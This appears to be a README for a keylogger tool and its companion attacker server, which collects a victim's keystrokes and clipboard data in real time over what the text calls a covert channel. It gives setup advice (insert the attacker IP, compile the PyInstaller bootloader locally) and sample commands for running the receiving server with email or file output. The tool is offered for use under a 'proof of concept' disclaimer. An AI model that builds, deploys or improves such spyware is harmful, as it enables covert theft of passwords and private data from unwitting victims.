- Feel free to modify it as you see fit and it can be improved in many ways to suit your needs.
This project focuses on a malicious server that remotely receives keyboard logs and data saved on the victim's clipboard, emulating an illegal covert channel between the victim and the attacker. When the victim runs the keylogger, the first thing it will do is connect to the attacker's remote server and send the logs in real time. It has been carefully designed to present the keyboard logs in the most user-friendly way possible.
(Remember to add your local or proxy IP address in the keylogger script)
Simple technique: Compile the PyInstaller bootloader locally using Microsoft C/C++ compiler and then use pyinstaller to compile the keylogger code.
./app.py 192.168.32.34 -e smtp.gmail.com
./app.py 192.168.18.20 -f keylogs.txt
I am not responsible for any illegal use or damage caused by this tool. It primarily serves as a proof of concept and is intended to raise awareness about cybersecurity